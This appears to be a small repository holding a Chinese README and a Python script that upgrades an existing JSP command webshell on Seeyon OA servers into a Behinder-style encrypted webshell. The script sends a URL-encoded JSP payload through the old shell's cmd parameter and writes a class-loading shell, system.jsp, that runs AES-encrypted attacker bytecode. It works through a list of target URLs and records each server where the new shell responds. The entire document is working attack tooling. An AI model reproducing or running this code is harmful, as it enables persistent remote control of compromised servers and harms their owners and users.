├── README.md
└── cmd2bx.py


/README.md:
--------------------------------------------------------------------------------
1 | # cmd2bx
2 | 把jsp的cmdshell升级为冰蝎一句话
3 | 
4 | 详情请戳：https://yzddmr6.tk/posts/cmd2bx/
5 | 


--------------------------------------------------------------------------------
/cmd2bx.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | import os,time
 3 | 
 4 | '''
 5 | Code By yzddMr6
 6 | '''
 7 | 
 8 | 
 9 | headers = {
10 |     "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36"
11 | }
12 | 
13 | cmdshell='/seeyon/test123456.jsp?pwd=aaa&cmd='#改成你自己的地址跟密码
14 | url_payload='cmd%20/c+echo+%5e%3c%25%40page+import%3d%22java.util.*%2cjavax.crypto.*%2cjavax.crypto.spec.*%22%25%5e%3e%5e%3c%25!class+U+extends+ClassLoader%7bU(ClassLoader+c)%7bsuper(c)%3b%7dpublic+Class+g(byte+%5b%5db)%7breturn+super.defineClass(b%2c0%2cb.length)%3b%7d%7d%25%5e%3e%5e%3c%25if(request.getParameter(%22dnxs%22)!%3dnull)%7bString+k%3d(%22%22%2bUUID.randomUUID()).replace(%22-%22%2c%22%22).substring(16)%3bsession.putValue(%22u%22%2ck)%3bout.print(k)%3breturn%3b%7dCipher+c%3dCipher.getInstance(%22AES%22)%3bc.init(2%2cnew+SecretKeySpec((session.getValue(%22u%22)%2b%22%22).getBytes()%2c%22AES%22))%3bnew+U(this.getClass().getClassLoader()).g(c.doFinal(new+sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext)%3b%25%5e%3e+%3e+..%5cwebapps%5cseeyon%5csystem.jsp'
15 | bxshell='/seeyon/system.jsp'
16 | 
17 | def cmd2bx(url):
18 |     requests.get(url=url+cmdshell+url_payload,headers=headers,timeout=10)
19 |     url1=url+bxshell
20 |     res=requests.get(url=url1,headers=headers)
21 |     if res.status_code==200 or res.status_code==500:
22 |         with open('savebx.txt','a') as save:
23 |             save.write('BXSHELL [+] '+url1+'\n')
24 |         print('BXSHELL [+] '+url1)
25 |         return 1
26 |     else:
27 |         print('BXSHELL [-] '+url1)
28 |         return 0 
29 | 
30 | 
31 | if __name__=='__main__':
32 |     start_time = time.time()
33 |     urllist = []
34 |     url_file_name = input('file or url :')
35 |     try:
36 |         if '://' in url_file_name:
37 |             cmd2bx(url_file_name.strip())
38 |         else:
39 |             if os.path.exists(url_file_name):
40 |                 print(url_file_name, 'exists!')
41 |                 with open(url_file_name, 'r') as url_file:
42 |                     for url in url_file.readlines():
43 |                         url = url.strip()
44 |                         urllist.append(url)
45 |                     for u in urllist:
46 |                         result=cmd2bx(u)
47 |                         print("scanned down with %.2f\n" % float(time.time() - start_time))
48 |             else:
49 |                 print(url_file_name + " not exist!")
50 |                 exit(0)
51 |     except Exception as e:
52 |         print(start_time, e)
53 | 


--------------------------------------------------------------------------------